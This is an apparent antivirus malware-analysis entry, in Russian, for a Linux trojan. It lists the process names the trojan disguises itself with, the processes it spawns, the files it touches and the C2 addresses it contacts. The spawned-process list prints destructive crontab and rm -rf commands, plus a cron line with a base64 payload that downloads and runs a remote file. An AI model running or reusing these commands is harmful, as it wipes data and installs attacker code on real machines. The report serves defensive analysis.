Техническая информация
Вредоносные функции:
Запускает себя в качестве демона
Подменяет имя приложения на:
- ybxp
- liueto
- lycq
- * **
- ufw
Запускает процессы:
- sh -c crontab -r ; rm -rf /tmp/* ; rm -rf /tmp/.* ; rm -rf /dev/shm/* ; rm -rf /dev/shm/.* ; rm -rf /var/spool/cron/*/* ; rm -rf /var/spool/ana*/*/*
- crontab -r
- rm -rf /tmp/*
- rm -rf /tmp/. /tmp/.. /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix
- rm -rf /dev/shm/*
- rm -rf /dev/shm/. /dev/shm/..
- rm -rf /var/spool/cron/*/*
- rm -rf /var/spool/ana*/*/*
- sh -c /root/hclrjy
- /root/hclrjy
- sh -c /root/lumktt lycq
- /root/lumktt lycq
- sh -c /root/tmxuel ojtr
- /root/tmxuel ojtr
- sh -c /root/dtdm
- /root/dtdm
- sh -c /root/qoruelgcdi snhv
- sh -c /root/flxlusnnud lyxc
- sh -c /root/vmpshocrts xufe
- sh -c /root/sjuspepcbg vtvp
- sh -c /root/vesxdextqg msdk
- sh -c /root/vigmdldwjh bxtq
- sh -c /root/xcpgjilhdx tomb
- sh -c /root/twkrjhbfbe sxdj
- sh -c /root/cuymljvjoo sgcu
- sh -c /root/urmdtbming euqy
- /root/twkrjhbfbe sxdj
- /root/xcpgjilhdx tomb
- sh -c /root/gwsfio ddhn
- sh -c /root/cnxidmkoxd icsj
- sh -c echo '* * * * * echo -n \"KCBjaG1vZCA3NzcgL3Vzci9iaW4vcHkqIDsgcHl0aG9uIC1jICdpbXBvcnQgb3Msc3lzLHVybGxpYixvcy5wYXRoO25tPW9zLnVyYW5kb20oNCkuZW5jb2RlKCJoZXgiKTsgaG09b3MucGF0aC5leHBhbmR1c2VyKCJ+LyIpOyBwYXRocyA9W2htLCIvdG1wLyIsIi92YXIvdG1wLyIsIi9kZXYvc2htLyJdOyBsX3B0aD1uZXh0KGl0ZXIocHRoIGZvciBwdGggaW4gcGF0aHMgaWYgb3MuYWNjZXNzKHB0aCwgb3MuRl9PS3xvcy5SX09LfG9zLldfT0t8b3MuWF9PSyApIG9yIFtdKSwgTm9uZSk7aD1sX3B0aCtubTsgaGQgPSB1cmxsaWIudXJscmV0cmlldmUgKCJodHRwOi8vMzcuMjI4LjEyOS41OC9ob21lL3N5bmMiLCBoKTsgZi5jbG9zZSgpO29zLnN5c3RlbSgiY2htb2QgNzc3NyB7fSIuZm9ybWF0KGgpKTtvcy5zeXN0ZW0oImNobW9kICt4IHt9Ii5mb3JtYXQoaCkpOyBvcy5zeXN0ZW0oInt9Ii5mb3JtYXQoaCkpJyAgKQ==\" | base64 -d | sh > /dev/null' | crontab -;
- /root/gwsfio ddhn
- /root/cnxidmkoxd icsj
- crontab -
Завершает системные процессы:
- sshd
Завершает следующие процессы:
- run.sh
- bash
- atd
- (sd-pam)
- /bin/sh
- /root/lumktt
- /root/dtdm
- Unknown process with PID: 0
- cron
- systemd-journal
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
- /root/hclrjy
- /root/lumktt
- /root/tmxuel
- /root/dtdm
- /dev/urandom
- /root/qoruelgcdi
- /root/vmpshocrts
- /root/flxlusnnud
- /root/sjuspepcbg
- /root/vesxdextqg
- /usr/bin/perl
- /usr/bin/python3.4
- /root/vigmdldwjh
- /usr/bin/python2.7
- /usr/bin/mawk
- /usr/bin/xargs
- /root/xcpgjilhdx
- /bin/sed
- /usr/bin/crontab
- /root/cuymljvjoo
- /root/urmdtbming
- /root/gwsfio
- /root/cnxidmkoxd
Создает или модифицирует файлы:
- /root/hclrjy
- /root/lumktt
- /root/c
- /root/dtdm
- /root/tmxuel
- /root/flxlusnnud
- /root/qoruelgcdi
- /root/vmpshocrts
- /root/vesxdextqg
- /root/sjuspepcbg
- /root/vigmdldwjh
- /root/xcpgjilhdx
- /root/twkrjhbfbe
- /root/cuymljvjoo
- /root/urmdtbming
- /root/gwsfio
- /root/cnxidmkoxd
Удаляет файлы:
- /tmp/*
- /dev/shm/*
- /var/spool/cron/*/*
- /var/spool/ana*/*/*
- /root/lumktt
- /root/dtdm
- /root/tmxuel
- /root/ojtr
- /root/qoruelgcdi
- /root/vmpshocrts
- /root/vesxdextqg
- /root/vigmdldwjh
- /root/xcpgjilhdx
- /root/twkrjhbfbe
- /root/cuymljvjoo
- /root/urmdtbming
- /root/gwsfio
- /root/cnxidmkoxd
Сетевая активность:
HTTP GET-запросы:
- 37.###.129.58/home/sync
- 95.###.142.161/c/cdc
- 95.###.142.161/c/coooc
- 95.###.142.161/c/nap
- 37.###.129.58/home/slpr
- 95.###.142.161/c/dth
Получает данные от следующих серверов:
- 45.##.54.157:80
